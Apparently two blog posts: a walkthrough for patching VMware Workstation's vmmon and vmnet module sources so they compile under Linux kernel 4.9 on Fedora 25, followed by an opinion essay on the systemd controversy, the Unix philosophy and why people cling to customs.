Well, after an upgrade of Fedora 25 which included kernel 4.9.5, VMWare Workstation stopped working again! The fix is easy, even though it is annoying to constantly have to patch something in VMWare. Anyway, the procedure, taken from here, is:
  1. Switch to the root account.
  2. Go to /usr/lib/vmware/modules/source.
  3. Make a backup of the files vmmon.tar and vmnet.tar.
  4. Unpack those files using the 'tar xf' command.
  5. Patch the file vmnet-only/user_if.c, i.e. open it in your favorite text editor and, in the function UserifLockPage() that's around line 113, change the following part:
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
        retval = get_user_pages(addr, 1, 1, 0, &page, NULL);
    #else
        retval = get_user_pages(current, current->mm, addr,
                    1, 1, 0, &page, NULL);
    #endif
    with the following:
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 9, 0)
         retval = get_user_pages(addr, 1, 0, &page, NULL);
    #else
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
         retval = get_user_pages(addr, 1, 1, 0, &page, NULL);
    #else
         retval = get_user_pages(current, current->mm, addr,
                     1, 1, 0, &page, NULL);
    #endif
    #endif
  6. Then, in the file vmmon-only/linux/hostif.c, in the function HostIFGetUserPages() that's around line 1158, change the following
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
       retval = get_user_pages((unsigned long)uvAddr, numPages, 0, 0, ppages, NULL);
    #else
       retval = get_user_pages(current, current->mm, (unsigned long)uvAddr,
                               numPages, 0, 0, ppages, NULL);
    #endif
    with
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 9, 0)
       retval = get_user_pages((unsigned long)uvAddr, numPages, 0, ppages, NULL);
    #else
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
       retval = get_user_pages((unsigned long)uvAddr, numPages, 0, 0, ppages, NULL);
    #else
       retval = get_user_pages(current, current->mm, (unsigned long)uvAddr,
                               numPages, 0, 0, ppages, NULL);
    #endif
    #endif
  7. Create new vmmon.tar and vmnet.tar using the following commands:
    tar cf vmnet.tar vmnet-only
    tar cf vmmon.tar vmmon-only
  8. Start vmware as you would normally start it. This will trigger module compilation and everything should work.
Note that you are doing everything at your own risk! :)
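For convenience, the non-editing steps above (backup, unpack, repack, rebuild) roughly correspond to the following commands (a sketch, run as root, again at your own risk):
cd /usr/lib/vmware/modules/source
cp vmmon.tar vmmon.tar.orig
cp vmnet.tar vmnet.tar.orig
tar xf vmmon.tar
tar xf vmnet.tar
# edit vmnet-only/user_if.c and vmmon-only/linux/hostif.c as described in steps 5 and 6
tar cf vmnet.tar vmnet-only
tar cf vmmon.tar vmmon-only
vmware &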

Friday, January 6, 2017

Few thoughts about systemd and human behavior

I was just reading the comments on a Hacker News post about systemd. Systemd, as you might know, is a replacement for the venerable init system. Anyway, reading the comments meant reading the same story over and over again: there are those strongly for and those strongly against systemd, in some cases based on arguments (valid or not) and in other cases based on feelings. In this post I won't go into technical details about systemd; I'll concentrate on the human behavior that is most interesting to me. And yes, if you think I'm pro systemd, then you're right, I am!

Now, what I think is the key characteristic of people is that they become too religious about something and thus unable to critically evaluate that particular thing. It has happened many times, and in some cases the transition from controversy to dogma was short, while in other cases it took several generations or more. Take the Christian religion as an example! It also started as something controversial, but ended as a dogma that isn't allowed to be questioned. Or something more technical, the ISO/OSI 7-layer model. It started as a controversy: how many layers, 5, 6, or 7? We know the result of this controversy, and after a short period of time it turned into a dogma, i.e. that 7 is some magical number of layers that isn't to be questioned. Luckily, I don't think that is the case any more, that is, it is now clear that 7 layers was too much. Anyway, I could list such cases on and on, almost ad infinitum. Note that I don't claim that every controversial change succeeded in the end; some were abandoned, and that's (probably) OK.

I should also mention one other interesting thing called customs (as in norms). People's lives are interwoven with customs. We have a tendency to do something just because our elders did it, i.e. without knowing why. I don't think that's bad per se; after all, it probably helped us survive. The problem with customs is that they assume slow development and slow change in the environment. In such conditions they are a very valuable tool for collecting and passing experience from generation to generation. But when the speed of development and change reaches some tipping point, customs become a problem, not an advantage, and they stall adjustment to the new circumstances. So, my personal opinion about customs is that we should respect them, but never forget to analyze whether they are applicable and useful in a given situation.

Finally, there is one more characteristic of human beings, and that is inertia. We are used to doing things in a certain way, and that's hard to change. I don't think it is unrelated to religion and customs; on the contrary, I think they are related, and there might be something else behind all of them. But I won't go into that, at least not in this post.

So, what does all this have to do with systemd? Well, there is a principle or philosophy in Unix development that states that whatever you program or create in Unix should do one thing and do it well. For example, a tool to search for files should do that well, but not do anything else. My opinion is that this philosophy turned into a custom and a religion at the same time. Just go through the comments related to systemd and read them for a bit. A substantial number of arguments is based on the premise that there is a principle and it should be obeyed at any cost and in any circumstance. But all those who bring up this argument forget to justify why the principle is applicable in this particular scenario.

And the state of computing has drastically changed between the time when this philosophy was (supposedly) defined (i.e. the 1970s) and today's world. Let me mention just a few big differences. Machines at the time Unix was created were multiuser and stationary, with limited resources and capabilities, and they were used for much narrower application domains than today. Today, machines are powerful and inexpensive, and used primarily by a single user. They do a lot more than they did 40 years ago, and they offer users a lot more. Finally, users' expectations of them are much higher than they used to be.

One advantage of doing one thing and doing it well is that it reduces complexity. In a world where programming was done in C or assembler, this was very important. But it also has a drawback, and that is that you lose the ability to see above the simple things. This, in turn, costs you performance but also functionality, i.e. what you can do. Take, for example, pipes in Unix. They are great for data stored as text organized in records consisting of lines. But what about JSON, XML and other complex structures? In other words, being simple means you can do only simple things.

This tension between simple-and-manageable and complex-but-more-capable is actually a theme that occurs in other areas, too. For example, in networking you have layers, but because cross-layer communication is restricted, you have problems with modern networks. Or take, for example, programming and organizing software into simple modules or objects. Again, the more primitive the base system is, the more problems you have achieving complex behavior, in terms of performance, complexity, and so on.

A few more things to add to the mix about Unix development. First, Unix is definitely a success. But that doesn't mean that everything Unix did is a success. There are things that are good, bad, and ugly. Nothing is perfect, nor will it ever be. So we have to keep in mind that Unix can be better. The next thing to keep in mind is that each one of us has a particular view of the world, a.k.a. Unix, and our view is not necessarily the right view, or the view of the majority. This fact should influence the way we express ourselves in comments. So, do not overgeneralize from a single personal use case. Still, there are people whose opinion is more relevant, and those are the ones who maintain init/systemd and similar systems, as well as those who write scripts and modules for them.

Anyway, I'll stop here. My general opinion is that we are in the 21st century and we have to re-evaluate everything we think should be done a certain way (customs) and, in doing so, not be religious about particular things.

P.S. Systemd is not a single process/binary but a set of them, so it's not monolithic. Yet some argue it is monolithic! What is the definition of "monolithic"? By that line of reasoning, GNU coreutils is monolithic software and thus not in accordance with the Unix philosophy!
